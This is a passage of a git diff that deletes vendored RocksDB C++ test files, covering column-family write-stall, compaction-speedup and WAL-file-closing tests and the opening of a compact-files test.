-  vstorage->set_l0_delay_trigger_count(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(0, GetDbDelayedWriteRate());
-  ASSERT_EQ(kBaseRate, dbfull()->TEST_write_controler().delayed_write_rate());
-
-  vstorage->set_l0_delay_trigger_count(60);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(0, GetDbDelayedWriteRate());
-  ASSERT_EQ(kBaseRate, dbfull()->TEST_write_controler().delayed_write_rate());
-
-  mutable_cf_options.disable_auto_compactions = false;
-  vstorage->set_l0_delay_trigger_count(70);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(71);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(501);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-}
-
-TEST_F(ColumnFamilyTest, CompactionSpeedupSingleColumnFamily) {
-  db_options_.max_background_compactions = 6;
-  Open({"default"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-
-  // Speed up threshold = min(4 * 2, 4 + (36 - 4)/4) = 8
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 36;
-  mutable_cf_options.level0_stop_writes_trigger = 50;
-  // Speedup threshold = 200 / 4 = 50
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(40);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(45);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(7);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(9);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(6);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  // Speed up threshold = min(4 * 2, 4 + (12 - 4)/4) = 6
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 16;
-  mutable_cf_options.level0_stop_writes_trigger = 30;
-
-  vstorage->set_l0_delay_trigger_count(5);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(7);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(3);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-TEST_F(ColumnFamilyTest, WriteStallTwoColumnFamilies) {
-  const uint64_t kBaseRate = 810000u;
-  db_options_.delayed_write_rate = kBaseRate;
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  ColumnFamilyData* cfd1 =
-      static_cast<ColumnFamilyHandleImpl*>(handles_[1])->cfd();
-  VersionStorageInfo* vstorage1 = cfd1->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-  mutable_cf_options.level0_slowdown_writes_trigger = 20;
-  mutable_cf_options.level0_stop_writes_trigger = 10000;
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  MutableCFOptions mutable_cf_options1 = mutable_cf_options;
-  mutable_cf_options1.soft_pending_compaction_bytes_limit = 500;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(600);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(70);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(800);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(700);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(600);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-}
-
-TEST_F(ColumnFamilyTest, CompactionSpeedupTwoColumnFamilies) {
-  db_options_.max_background_compactions = 6;
-  column_family_options_.soft_pending_compaction_bytes_limit = 200;
-  column_family_options_.hard_pending_compaction_bytes_limit = 2000;
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  ColumnFamilyData* cfd1 =
-      static_cast<ColumnFamilyHandleImpl*>(handles_[1])->cfd();
-  VersionStorageInfo* vstorage1 = cfd1->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-  // Speed up threshold = min(4 * 2, 4 + (36 - 4)/4) = 8
-  mutable_cf_options.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options.level0_slowdown_writes_trigger = 36;
-  mutable_cf_options.level0_stop_writes_trigger = 30;
-  // Speedup threshold = 200 / 4 = 50
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-
-  MutableCFOptions mutable_cf_options1 = mutable_cf_options;
-  mutable_cf_options1.level0_slowdown_writes_trigger = 16;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(40);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(60);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(30);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(70);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(20);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->TEST_set_estimated_compaction_needed_bytes(3);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(9);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage1->set_l0_delay_trigger_count(2);
-  cfd1->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(ColumnFamilyTest, FlushCloseWALFiles) {
-  SpecialEnv env(Env::Default());
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DBImpl::BGWorkFlush:done", "FlushCloseWALFiles:0"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Block flush jobs from running
-  test::SleepingBackgroundTask sleeping_task;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  TEST_SYNC_POINT("FlushCloseWALFiles:0");
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-TEST_F(ColumnFamilyTest, IteratorCloseWALFile1) {
-  SpecialEnv env(Env::Default());
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  // Create an iterator holding the current super version.
-  Iterator* it = db_->NewIterator(ReadOptions(), handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-  Flush(1);
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  // Flush jobs will close previous WAL files after finishing. By
-  // block flush jobs from running, we trigger a condition where
-  // the iterator destructor should close the WAL files.
-  test::SleepingBackgroundTask sleeping_task;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  delete it;
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  WaitForFlush(1);
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, IteratorCloseWALFile2) {
-  SpecialEnv env(Env::Default());
-  // Allow both of flush and purge job to schedule.
-  env.SetBackgroundThreads(2, Env::HIGH);
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(2));
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  // Create an iterator holding the current super version.
-  ReadOptions ro;
-  ro.background_purge_on_iterator_cleanup = true;
-  Iterator* it = db_->NewIterator(ro, handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-  Flush(1);
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ColumnFamilyTest::IteratorCloseWALFile2:0",
-       "DBImpl::BGWorkPurge:start"},
-      {"ColumnFamilyTest::IteratorCloseWALFile2:2",
-       "DBImpl::BackgroundCallFlush:start"},
-      {"DBImpl::BGWorkPurge:end", "ColumnFamilyTest::IteratorCloseWALFile2:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  delete it;
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:0");
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:1");
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:2");
-  WaitForFlush(1);
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // TEST functions are not supported in lite
-TEST_F(ColumnFamilyTest, ForwardIteratorCloseWALFile) {
-  SpecialEnv env(Env::Default());
-  // Allow both of flush and purge job to schedule.
-  env.SetBackgroundThreads(2, Env::HIGH);
-  db_options_.env = &env;
-  db_options_.max_background_flushes = 1;
-  column_family_options_.memtable_factory.reset(new SpecialSkipListFactory(3));
-  column_family_options_.level0_file_num_compaction_trigger = 2;
-  Open();
-  CreateColumnFamilies({"one"});
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodar2", "mirko"));
-  Flush(1);
-
-  // Create an iterator holding the current super version, as well as
-  // the SST file just flushed.
-  ReadOptions ro;
-  ro.tailing = true;
-  ro.background_purge_on_iterator_cleanup = true;
-  Iterator* it = db_->NewIterator(ro, handles_[1]);
-  // A flush will make `it` hold the last reference of its super version.
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodar2", "mirko"));
-  Flush(1);
-
-  WaitForCompaction();
-
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-  ASSERT_OK(Put(0, "fodor", "mirko"));
-  ASSERT_OK(Put(1, "fodor", "mirko"));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ColumnFamilyTest::IteratorCloseWALFile2:0",
-       "DBImpl::BGWorkPurge:start"},
-      {"ColumnFamilyTest::IteratorCloseWALFile2:2",
-       "DBImpl::BackgroundCallFlush:start"},
-      {"DBImpl::BGWorkPurge:end", "ColumnFamilyTest::IteratorCloseWALFile2:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  WriteOptions wo;
-  wo.sync = true;
-  ASSERT_OK(db_->Put(wo, handles_[1], "fodor", "mirko"));
-
-  env.delete_count_.store(0);
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  // Deleting the iterator will clear its super version, triggering
-  // closing all files
-  it->Seek("");
-  ASSERT_EQ(2, env.num_open_wal_file_.load());
-  ASSERT_EQ(0, env.delete_count_.load());
-
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:0");
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:1");
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  ASSERT_EQ(1, env.delete_count_.load());
-  TEST_SYNC_POINT("ColumnFamilyTest::IteratorCloseWALFile2:2");
-  WaitForFlush(1);
-  ASSERT_EQ(1, env.num_open_wal_file_.load());
-  ASSERT_EQ(1, env.delete_count_.load());
-
-  delete it;
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  Reopen();
-  ASSERT_EQ("mirko", Get(0, "fodor"));
-  ASSERT_EQ("mirko", Get(1, "fodor"));
-  db_options_.env = env_;
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-// Disable on windows because SyncWAL requires env->IsSyncThreadSafe()
-// to return true which is not so in unbuffered mode.
-#ifndef OS_WIN
-TEST_F(ColumnFamilyTest, LogSyncConflictFlush) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-
-  Put(0, "", "");
-  Put(1, "foo", "bar");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::SyncWAL:BeforeMarkLogsSynced:1",
-        "ColumnFamilyTest::LogSyncConflictFlush:1"},
-       {"ColumnFamilyTest::LogSyncConflictFlush:2",
-        "DBImpl::SyncWAL:BeforeMarkLogsSynced:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([&] { db_->SyncWAL(); });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::LogSyncConflictFlush:1");
-  Flush(1);
-  Put(1, "foo", "bar");
-  Flush(1);
-
-  TEST_SYNC_POINT("ColumnFamilyTest::LogSyncConflictFlush:2");
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  Close();
-}
-#endif
-
-// this test is placed here, because the infrastructure for Column Family
-// test is being used to ensure a roll of wal files.
-// Basic idea is to test that WAL truncation is being detected and not
-// ignored
-TEST_F(ColumnFamilyTest, DISABLED_LogTruncationTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two"});
-
-  Build(0, 100);
-
-  // Flush the 0th column family to force a roll of the wal log
-  Flush(0);
-
-  // Add some more entries
-  Build(100, 100);
-
-  std::vector<std::string> filenames;
-  ASSERT_OK(env_->GetChildren(dbname_, &filenames));
-
-  // collect wal files
-  std::vector<std::string> logfs;
-  for (size_t i = 0; i < filenames.size(); i++) {
-    uint64_t number;
-    FileType type;
-    if (!(ParseFileName(filenames[i], &number, &type))) continue;
-
-    if (type != kLogFile) continue;
-
-    logfs.push_back(filenames[i]);
-  }
-
-  std::sort(logfs.begin(), logfs.end());
-  ASSERT_GE(logfs.size(), 2);
-
-  // Take the last but one file, and truncate it
-  std::string fpath = dbname_ + "/" + logfs[logfs.size() - 2];
-  std::vector<std::string> names_save = names_;
-
-  uint64_t fsize;
-  ASSERT_OK(env_->GetFileSize(fpath, &fsize));
-  ASSERT_GT(fsize, 0);
-
-  Close();
-
-  std::string backup_logs = dbname_ + "/backup_logs";
-  std::string t_fpath = backup_logs + "/" + logfs[logfs.size() - 2];
-
-  ASSERT_OK(env_->CreateDirIfMissing(backup_logs));
-  // Not sure how easy it is to make this data driven.
-  // need to read back the WAL file and truncate last 10
-  // entries
-  CopyFile(fpath, t_fpath, fsize - 9180);
-
-  ASSERT_OK(env_->DeleteFile(fpath));
-  ASSERT_OK(env_->RenameFile(t_fpath, fpath));
-
-  db_options_.wal_recovery_mode = WALRecoveryMode::kPointInTimeRecovery;
-
-  OpenReadOnly(names_save);
-
-  CheckMissed();
-
-  Close();
-
-  Open(names_save);
-
-  CheckMissed();
-
-  Close();
-
-  // cleanup
-  env_->DeleteDir(backup_logs);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compact_files_test.cc b/thirdparty/rocksdb/db/compact_files_test.cc
deleted file mode 100644
index 5aad611..0000000
--- a/thirdparty/rocksdb/db/compact_files_test.cc
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <string>
-#include <thread>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class CompactFilesTest : public testing::Test {
- public:
-  CompactFilesTest() {
-    env_ = Env::Default();
-    db_name_ = test::TmpDir(env_) + "/compact_files_test";
-  }
-
-  std::string db_name_;
-  Env* env_;
-};
-
-// A class which remembers the name of each flushed file.
-class FlushedFileCollector : public EventListener {
- public:
-  FlushedFileCollector() {}
-  ~FlushedFileCollector() {}
-
-  virtual void OnFlushCompleted(
-      DB* db, const FlushJobInfo& info) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.push_back(info.file_path);
-  }
-
-  std::vector<std::string> GetFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    std::vector<std::string> result;
-    for (auto fname : flushed_files_) {
-      result.push_back(fname);
-    }
-    return result;
-  }
-  void ClearFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.clear();
-  }
-
- private:
-  std::vector<std::string> flushed_files_;
-  std::mutex mutex_;
-};
-
-TEST_F(CompactFilesTest, L0ConflictsFiles) {
-  Options options;
-  // to trigger compaction more easily
-  const int kWriteBufferSize = 10000;
-  const int kLevel0Trigger = 2;
-  options.create_if_missing = true;
-  options.compaction_style = kCompactionStyleLevel;
-  // Small slowdown and stop trigger for experimental purpose.
-  options.level0_slowdown_writes_trigger = 20;
-  options.level0_stop_writes_trigger = 20;
-  options.level0_stop_writes_trigger = 20;
-  options.write_buffer_size = kWriteBufferSize;
-  options.level0_file_num_compaction_trigger = kLevel0Trigger;
-  options.compression = kNoCompression;
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactFilesImpl:0", "BackgroundCallCompaction:0"},
-      {"BackgroundCallCompaction:1", "CompactFilesImpl:1"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // create couple files
-  // Background compaction starts and waits in BackgroundCallCompaction:0
-  for (int i = 0; i < kLevel0Trigger * 4; ++i) {
-    db->Put(WriteOptions(), ToString(i), "");
-    db->Put(WriteOptions(), ToString(100 - i), "");
-    db->Flush(FlushOptions());
-  }
-
-  rocksdb::ColumnFamilyMetaData meta;
-  db->GetColumnFamilyMetaData(&meta);
-  std::string file1;
-  for (auto& file : meta.levels[0].files) {
-    ASSERT_EQ(0, meta.levels[0].level);
-    if (file1 == "") {
-      file1 = file.db_path + "/" + file.name;
-    } else {
-      std::string file2 = file.db_path + "/" + file.name;
-      // Another thread starts a compact files and creates an L0 compaction
-      // The background compaction then notices that there is an L0 compaction
-      // already in progress and doesn't do an L0 compaction
-      // Once the background compaction finishes, the compact files finishes
-      ASSERT_OK(
-          db->CompactFiles(rocksdb::CompactionOptions(), {file1, file2}, 0));
-      break;
-    }
-  }
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  delete db;
-}
-
-TEST_F(CompactFilesTest, ObsoleteFiles) {
-  Options options;
-  // to trigger compaction more easily
-  const int kWriteBufferSize = 65536;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.write_buffer_size = kWriteBufferSize;
-  options.max_write_buffer_number = 2;
-  options.compression = kNoCompression;
-
-  // Add listener
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // create couple files
-  for (int i = 1000; i < 2000; ++i) {
-    db->Put(WriteOptions(), ToString(i),
-            std::string(kWriteBufferSize / 10, 'a' + (i % 26)));
-  }
-
-  auto l0_files = collector->GetFlushedFiles();
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files, 1));
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForCompact();
-
-  // verify all compaction input files are deleted
-  for (auto fname : l0_files) {
-    ASSERT_EQ(Status::NotFound(), env_->FileExists(fname));
-  }
-  delete db;
-}
-
-TEST_F(CompactFilesTest, NotCutOutputOnLevel0) {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  options.level0_slowdown_writes_trigger = 1000;
-  options.level0_stop_writes_trigger = 1000;
-  options.write_buffer_size = 65536;
-  options.max_write_buffer_number = 2;
-  options.compression = kNoCompression;
-  options.max_compaction_bytes = 5000;
-
-  // Add listener
-  FlushedFileCollector* collector = new FlushedFileCollector();
-  options.listeners.emplace_back(collector);
-
-  DB* db = nullptr;
-  DestroyDB(db_name_, options);
-  Status s = DB::Open(options, db_name_, &db);
-  assert(s.ok());
-  assert(db);
-
-  // create couple files
-  for (int i = 0; i < 500; ++i) {
-    db->Put(WriteOptions(), ToString(i), std::string(1000, 'a' + (i % 26)));
-  }
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForFlushMemTable();
-  auto l0_files_1 = collector->GetFlushedFiles();
-  collector->ClearFlushedFiles();
-  for (int i = 0; i < 500; ++i) {
-    db->Put(WriteOptions(), ToString(i), std::string(1000, 'a' + (i % 26)));
-  }
-  reinterpret_cast<DBImpl*>(db)->TEST_WaitForFlushMemTable();
-  auto l0_files_2 = collector->GetFlushedFiles();
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files_1, 0));
-  ASSERT_OK(db->CompactFiles(CompactionOptions(), l0_files_2, 0));
-  // no assertion failure
-  delete db;
-}
-
-TEST_F(CompactFilesTest, CapturingPendingFiles) {
-  Options options;
-  options.create_if_missing = true;
-  // Disable RocksDB background compaction.
-  options.compaction_style = kCompactionStyleNone;
-  // Always do full scans for obsolete files (needed to reproduce the issue).
